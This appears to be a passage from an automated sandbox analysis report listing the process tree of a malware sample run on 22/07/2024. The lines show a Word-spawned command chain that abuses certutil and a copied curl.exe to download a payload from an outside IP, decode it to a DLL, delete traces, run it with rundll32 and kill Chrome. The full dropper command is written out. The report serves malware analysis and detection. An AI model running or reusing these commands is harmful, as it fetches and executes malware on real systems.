    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:10
    Start time:09:57:44
    Start date:22/07/2024
    Path:C:\Windows\SysWOW64\xcopy.exe
    Wow64 process (32bit):true
    Commandline:xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
    Imagebase:0x430000
    File size:43'520 bytes
    MD5 hash:7E9B7CE496D09F70C072930940F9F02C
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:true

    Target ID:11
    Start time:09:57:44
    Start date:22/07/2024
    Path:C:\Windows\SysWOW64\certutil.exe
    Wow64 process (32bit):true
    Commandline:certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
    Imagebase:0x340000
    File size:1'277'440 bytes
    MD5 hash:0DDA4F16AE041578B4E250AE12E06EB1
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:true

    Target ID:12
    Start time:09:57:45
    Start date:22/07/2024
    Path:C:\Windows\SysWOW64\certutil.exe
    Wow64 process (32bit):true
    Commandline:certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
    Imagebase:0x340000
    File size:1'277'440 bytes
    MD5 hash:0DDA4F16AE041578B4E250AE12E06EB1
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:true

    Target ID:13
    Start time:09:57:45
    Start date:22/07/2024
    Path:C:\Users\user\AppData\Local\Temp\curl.exe
    Wow64 process (32bit):true
    Commandline:C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
    Imagebase:0x860000
    File size:470'528 bytes
    MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Antivirus matches:
    • Detection: 0%, ReversingLabs
    Reputation:moderate
    Has exited:true

    Target ID:14
    Start time:09:57:49
    Start date:22/07/2024
    Path:C:\Windows\SysWOW64\certutil.exe
    Wow64 process (32bit):true
    Commandline:certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
    Imagebase:0x340000
    File size:1'277'440 bytes
    MD5 hash:0DDA4F16AE041578B4E250AE12E06EB1
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:true

    Target ID:15
    Start time:09:57:49
    Start date:22/07/2024
    Path:C:\Windows\SysWOW64\rundll32.exe
    Wow64 process (32bit):true
    Commandline:rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
    Imagebase:0xfc0000
    File size:61'440 bytes
    MD5 hash:889B99C52A60DD49227C5E485A016679
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:false

    Target ID:16
    Start time:09:57:49
    Start date:22/07/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
    Imagebase:0x7ff7868b0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:false

    Target ID:17
    Start time:09:57:49
    Start date:22/07/2024
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
    Imagebase:0x7ff7a6040000
    File size:289'792 bytes
    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:18
    Start time:09:57:49
    Start date:22/07/2024
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff66e660000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:19
    Start time:09:57:49
    Start date:22/07/2024
    Path:C:\Windows\System32\taskkill.exe
    Wow64 process (32bit):false
    Commandline:taskkill /F /IM chrome.exe
    Imagebase:0x7ff6956e0000
    File size:101'376 bytes
    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:21
    Start time:09:58:13
    Start date:22/07/2024
    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
    Wow64 process (32bit):false
    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Imagebase:0x7ff684c40000
    File size:3'242'272 bytes
    MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:22
    Start time:09:58:13
    Start date:22/07/2024
    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
    Wow64 process (32bit):false
    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1976,i,14189460158267219968,9438605418759963760,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Imagebase:0x7ff684c40000
    File size:3'242'272 bytes
    MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:23
    Start time:09:58:15
    Start date:22/07/2024
    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
    Wow64 process (32bit):false
    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://go.microsoft.com/fwlink/?linkid=2280386"
    Imagebase:0x7ff684c40000
    File size:3'242'272 bytes
    MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:26
    Start time:09:58:33
    Start date:22/07/2024
    Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    Wow64 process (32bit):true
    Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
    Imagebase:0x740000
    File size:1'620'872 bytes
    MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:false

    Target ID:28
    Start time:09:58:42
    Start date:22/07/2024
    Path:C:\Windows\SysWOW64\cmd.exe
    Wow64 process (32bit):true
    Commandline:C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
    Imagebase:0x1c0000
    File size:236'544 bytes
    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:29
    Start time:09:58:42
    Start date:22/07/2024
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff66e660000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:30
    Start time:09:58:42
    Start date:22/07/2024
    Path:C:\Windows\SysWOW64\xcopy.exe
    Wow64 process (32bit):true
    Commandline:xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
    Imagebase:0x430000
    File size:43'520 bytes
    MD5 hash:7E9B7CE496D09F70C072930940F9F02C
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:31
    Start time:09:58:42
    Start date:22/07/2024
    Path:C:\Windows\SysWOW64\certutil.exe
    Wow64 process (32bit):true
    Commandline:certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
    Imagebase:0x340000
    File size:1'277'440 bytes
    MD5 hash:0DDA4F16AE041578B4E250AE12E06EB1
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:32
    Start time:09:58:43
    Start date:22/07/2024
    Path:C:\Windows\SysWOW64\certutil.exe
    Wow64 process (32bit):true
    Commandline:certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
    Imagebase:0x340000
    File size:1'277'440 bytes
    MD5 hash:0DDA4F16AE041578B4E250AE12E06EB1
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:33
    Start time:09:58:43
    Start date:22/07/2024
    Path:C:\Users\user\AppData\Local\Temp\curl.exe
    Wow64 process (32bit):true
    Commandline:C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
    Imagebase:0x830000
    File size:470'528 bytes
    MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:34
    Start time:09:58:46
    Start date:22/07/2024
    Path:C:\Windows\SysWOW64\certutil.exe
    Wow64 process (32bit):true
    Commandline:certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
    Imagebase:0x340000
    File size:1'277'440 bytes
    MD5 hash:0DDA4F16AE041578B4E250AE12E06EB1
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:35
    Start time:09:58:47
    Start date:22/07/2024
    Path:C:\Windows\SysWOW64\rundll32.exe
    Wow64 process (32bit):true
    Commandline:rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
    Imagebase:0xfc0000
    File size:61'440 bytes
    MD5 hash:889B99C52A60DD49227C5E485A016679
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:36
    Start time:09:58:47
    Start date:22/07/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
    Imagebase:0x7ff7868b0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:37
    Start time:09:58:47
    Start date:22/07/2024
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
    Imagebase:0x7ff7a6040000
    File size:289'792 bytes
    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:38
    Start time:09:58:47
    Start date:22/07/2024
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff66e660000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:39
    Start time:09:58:47
    Start date:22/07/2024
    Path:C:\Windows\System32\taskkill.exe
    Wow64 process (32bit):false
    Commandline:taskkill /F /IM chrome.exe
    Imagebase:0x7ff6956e0000
    File size:101'376 bytes
    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    No disassembly